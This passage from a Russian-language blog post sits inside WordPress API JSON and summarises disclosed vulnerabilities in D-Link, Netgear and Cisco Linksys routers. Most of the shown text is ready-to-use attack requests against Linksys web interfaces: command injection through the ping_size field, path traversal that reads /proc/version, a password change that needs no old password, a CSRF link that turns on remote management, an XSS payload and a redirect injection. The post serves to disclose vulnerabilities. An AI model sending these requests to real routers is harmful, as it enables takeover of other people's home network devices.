class=\"html\">http:\/\/192.168.178.199\/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip= <\/code><\/pre>\n<h5>\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439<\/h5>\n<p>  \u041f\u0440\u0438\u043c\u0435\u0440:<\/p>\n<pre><code class=\"html\">POST \/apply.cgi HTTP\/1.1 Host: 192.168.178.199 User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko\/20100101 Firefox\/16.0 Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http:\/\/192.168.178.199\/Wireless_Basic.asp Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application\/x-www-form-urlencoded Content-Length: 75  submit_type=wsc_method2&change_action=gozila_cgi&next_page=..\/..\/proc\/version <\/code><\/pre>\n<p>  \u041f\u0440\u0438\u0434\u0451\u0442 \u043e\u0442\u0432\u0435\u0442 \u0432\u0438\u0434\u0430:<\/p>\n<pre><code class=\"html\">HTTP\/1.1 200 Ok Server: httpd Date: Thu, 01 Jan 1970 00:00:29 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text\/html Connection: close  Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012 <\/code><\/pre>\n<h5>\u0418\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u043f\u0430\u0440\u043e\u043b\u044f \u0431\u0435\u0437 \u0432\u0432\u043e\u0434\u0430 \u0441\u0442\u0430\u0440\u043e\u0433\u043e<\/h5>\n<p>  \u0410\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043c\u0435\u043d\u044f\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 POST-\u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e:<\/p>\n<pre><code class=\"html\">POST \/apply.cgi HTTP\/1.1 Host: 192.168.1.1 User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko\/20100101 Firefox\/16.0 Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http:\/\/192.168.1.1\/Management.asp Authorization: Basic xxxx Content-Type: application\/x-www-form-urlencoded Content-Length: 311  submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0  <\/code><\/pre>\n<h5>CSRF-\u0430\u0442\u0430\u043a\u0430 \u0434\u043b\u044f \u0441\u043c\u0435\u043d\u044b \u043f\u0430\u0440\u043e\u043b\u044f:<\/h5>\n<pre><code class=\"html\">http:\/\/&lt;IP&gt;\/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 <\/code><\/pre>\n<h5>\u041c\u0435\u0436\u0441\u0430\u0439\u0442\u043e\u0432\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442\u0438\u043d\u0433<\/h5>\n<pre><code class=\"html\">POST \/apply.cgi HTTP\/1.1 Host: 192.168.178.199 User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko\/20100101 Firefox\/16.0 Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http:\/\/192.168.178.199\/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application\/x-www-form-urlencoded Content-Length: 300  submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')\/\/&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0  <\/code><\/pre>\n<p>  <\/p>\n<h4>\u0420\u0435\u0434\u0438\u0440\u0435\u043a\u0442 \u043d\u0430 \u0434\u0440\u0443\u0433\u043e\u0439 \u0441\u0430\u0439\u0442<\/h4>\n<pre><code class=\"html\">POST \/apply.cgi HTTP\/1.1 Host: 192.168.178.199 User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko\/20100101 Firefox\/16.0 Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http:\/\/192.168.178.199\/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application\/x-www-form-urlencoded Content-Length: 290  submit_button=http:\/\/www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0 <\/code><\/pre>\n<\/p><\/div>\n<\/div>\n<p>  \u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u043f\u0435\u0440\u0432\u043e\u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a:<\/p>\n<ol>\n<li><a href=\"http:\/\/www.s3cur1ty.de\/m1adv2013-003\">Multiple Vulnerabilities in D&#8217;Link DIR-600 and DIR-300 (rev B)<\/a><\/li>\n<li><a href=\"http:\/\/www.s3cur1ty.de\/m1adv2013-008\">Multiple Vulnerabilities in D&#8217;Link DIR-615<\/a><\/li>\n<li><a href=\"http:\/\/www.s3cur1ty.de\/m1adv2013-002\">Multiple Vulnerabilities in Netgear SPH200D [Update: 03.02.2013]<\/a><\/li>\n<li><a href=\"http:\/\/www.s3cur1ty.de\/m1adv2013-004\">Multiple Vulnerabilities in Linksys E1500\/E2500<\/a><\/li>\n<\/ol>\n<div class=\"clear\"><\/div>\n<\/p><\/div>\n<p> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"http:\/\/habrahabr.ru\/post\/168683\/\"> http:\/\/habrahabr.ru\/post\/168683\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"content html_format\">   \t\u041f\u043e\u0445\u043e\u0436\u0435, \u043d\u0430\u0447\u0430\u043b\u043e \u0433\u043e\u0434\u0430 \u043d\u0435 \u0437\u0430\u0434\u0430\u043b\u043e\u0441\u044c \u0434\u043b\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u0439 \u0440\u043e\u0443\u0442\u0435\u0440\u043e\u0432. \u0411\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u044f \u0441\u043e\u043e\u0431\u0449\u0430\u043b \u043e <a href=\"http:\/\/habrahabr.ru\/post\/168613\/\">\u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 \u0440\u043e\u0443\u0442\u0435\u0440\u0430\u0445 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u0439<\/a>, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u043e\u0439 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 UPnP. \u0418 \u0432\u043e\u0442 \u0435\u0449\u0451 \u043e\u0434\u043d\u0430 \u043d\u043e\u0432\u043e\u0441\u0442\u044c \u043d\u0430 \u044d\u0442\u0443 \u0436\u0435 \u0442\u0435\u043c\u0443. \u041d\u0430 \u0441\u0435\u0439 \u0440\u0430\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043d\u044b\u0435. \u0417\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u043e \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u0435:<\/p>\n<ul>\n<li>D-Link DIR-615, DIR-600 \u0438 DIR-300 (rev B)<\/li>\n<li>Netgear DGN1000B<\/li>\n<li>Cisco Linksys E1500\/E2500<\/li>\n<li>Netgear SPH200D<\/li>\n<\/ul>\n<p>  \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b, \u043d\u043e \u0438\u0445 \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u044f\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0444\u0430\u043a\u0442\u043e\u0432: \u043e\u0434\u0438\u043d \u0430\u0432\u0442\u043e\u0440 \u0438 \u043d\u0435\u0436\u0435\u043b\u0430\u043d\u0438\u0435 \u0432\u0435\u043d\u0434\u043e\u0440\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043f\u0430\u0442\u0447 (\u0435\u0441\u043b\u0438 \u0432\u0435\u0440\u0438\u0442\u044c \u0430\u0432\u0442\u043e\u0440\u0443). <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-168683","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/168683","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=168683"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/168683\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=168683"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=168683"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=168683"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}